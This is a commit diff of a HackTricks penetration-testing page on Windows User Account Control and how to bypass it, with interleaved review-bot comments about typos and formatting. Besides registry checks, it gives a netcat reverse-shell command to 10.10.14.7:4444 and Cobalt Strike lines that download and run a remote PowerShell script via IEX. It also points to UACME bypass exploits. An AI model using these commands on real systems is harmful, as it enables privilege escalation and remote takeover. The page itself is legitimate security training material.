mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#3549] No subject
parent d2d1216657
commit 896002b372
1 changed file with 80 additions and 36 deletions
@ -86,14 +86,33 @@ Get Access Today:

## UAC

UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.

To **differentiate** which process is executed with **low** or **high privileges** **Mandatory Integrity Controls** (MIC) are used. If you still don't know what are Windows Integrity levels check the following page:
For more info about integrity levels:

{% content-ref url="windows-local-privilege-escalation/integrity-levels.md" %}
[integrity-levels.md](windows-local-privilege-escalation/integrity-levels.md)
{% endcontent-ref %}

When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.

This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:

| Group Policy Setting | Registry Key | Default Setting |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | <p></p><p>Enabled</p> |

### UAC Bypass Theory

Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.

Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
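Review bot: the first paragraph under `## UAC` has a garbled clause, "This is **achieved using default** the **low privileged token** of the user", and a stray comma in "When, the administrator"; suggest "This is achieved by default using the low-privileged token of the user. When the administrator executes ...". Further down, "a standard user key" should read "a standard user token", since the sentence is describing the two tokens an administrator receives, and the last table row carries raw HTML (`<p></p><p>Enabled</p>`) where every other row uses plain text; replace it with `Enabled`. The two adjacent lines "To **differentiate** ... check the following page:" and "For more info about integrity levels:" both introduce the same content-ref, so only one of them should remain in the result.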
@ -102,13 +121,25 @@ You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe*

### Check UAC

First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
To confirm if UAC is enabled do:

```
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```

Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.

Then, check **which level** is configured:

```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
```

* If **`0`** then, UAC won't prompt (like **disabled**)
* If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
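Review bot: the line "If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**." that directly follows the `ConsentPromptBehaviorAdmin` paragraph is a copy of the `EnableLUA` rule and is wrong for this value: `ConsentPromptBehaviorAdmin` selects the prompt behaviour, which the `0` / `1` / ... list further down already describes, not whether UAC is on; drop it. In the `EnableLUA` sentence, "if its" should be "if it's". The first code block also queries the whole `Policies\System` key and then `/v EnableLUA`; one form is enough, and the output shown matches the `/v EnableLUA` query.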
@ -130,16 +161,7 @@ If **`0`**(default), the **built-in Administrator account can** do remote admini
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**

### UAC bypass

{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
{% endhint %}

It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**

The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.\
All this information can be gathered using the metasploit module: `post/windows/gather/win_privs`
All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`

You can also check the groups of your user and get the integrity level:

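Review bot: "UAS prompt" in the hint should be "UAC prompt", and "straight forward" should be "straightforward" (the same hint text reappears later in this patch, so fix both copies). The two consecutive lines "All this information can be gathered using the metasploit module ..." differ only in the bolding of "metasploit"; make sure only one of them survives the edit. The paragraph before them ends with a hard line break (`\`) that glues it to the Metasploit sentence; if the sentences end up in separate paragraphs, drop the trailing backslash.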
@ -148,7 +170,32 @@ net user %username%
whoami /groups | findstr Level
```

#### **Very** Basic UAC "bypass" (full file system access)
## UAC bypass

{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
{% endhint %}

The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.

It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**

### UAC disabled

If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:

```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```

#### UAC bypass with token duplication

* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)

### **Very** Basic UAC "bypass" (full file system access)

If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).

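Review bot: the `Start-Process powershell -Verb runAs` block under `### UAC disabled` is PowerShell but is fenced as ```bash; tag it ```powershell so it is highlighted correctly and not read as a bash command. Heading levels are inconsistent in this hunk: `## UAC bypass` is promoted to a second-level heading, a sibling of `## UAC`, with `### UAC disabled` and `### **Very** Basic UAC "bypass" ...` hanging off it, but `#### UAC bypass with token duplication` between them stays at the fourth level; promote it to `###` so the three subsections sit at the same depth. Also, "mount the C$ shared via SMB (file system) local in a new disk" reads awkwardly; suggest "mount the C$ share locally via SMB as a new drive".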
@ -164,22 +211,7 @@ cd C$
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```

#### UAC disabled

If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:

```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```

#### UAC bypass with token duplication

* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)

#### UAC bypass with cobalt strike
### UAC bypass with cobalt strike

The Cobalt Strike techniques will only work if UAC is not set at it's max security level

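Review bot: "it's max security level" in the Cobalt Strike sentence should be "its max security level", and since the rest of the page calls that level "Always", saying "not set to the highest level (Always)" would tie the two statements together. The heading change `#### UAC bypass with cobalt strike` to `### UAC bypass with cobalt strike` is consistent with the `### UAC disabled` subsection introduced elsewhere in this patch.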
@ -195,12 +227,24 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```

#### UAC bypass exploits
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.

You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like\_Source\Akagi\outout\x64\Debug\Akagi.exe\_) , you will need to know **which one you need.**\
### UAC bypass exploits

[**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like `Source\Akagi\outout\x64\Debug\Akagi.exe`) , you will need to know **which one you need.**\
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.

**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
UACME has the **build version from which each technique started working**. You can search for a technique affecting your versions:

```
PS C:\> [environment]::OSVersion.Version

Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```

Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) page you get the Windows release `1607` from the build versions.

#### More UAC bypass

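Review bot: the UACME paragraph still has a space inside the link text and none after it ("[**UACME** ](https://github.com/hfiref0x/UACME)which"), so the rendered link reads "UACME which" run together; write "[**UACME**](https://github.com/hfiref0x/UACME), which". The example path `Source\Akagi\outout\x64\Debug\Akagi.exe` contains "outout", which looks like a typo for "output"; verify it against the actual build output directory. The `[environment]::OSVersion.Version` block is PowerShell output in an untagged fence; tag it ```powershell. The sentence "**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**." appears both above and below the UACME paragraph in this hunk; make sure only one placement survives.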
@ -223,7 +267,7 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
2. **IFileOperation**: Windows 10.
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.

#### Another UAC bypass technique
### Another UAC bypass technique

Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).

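Review bot: the numbered list jumps from "2. **IFileOperation**: Windows 10." straight to "4. Prepare a **script** ..."; either an item 3 is missing or the `IFileOperation` line was meant to be a nested sub-item whose indentation was lost, so check the list structure before merging. "Consists on watching" should be "This consists of watching".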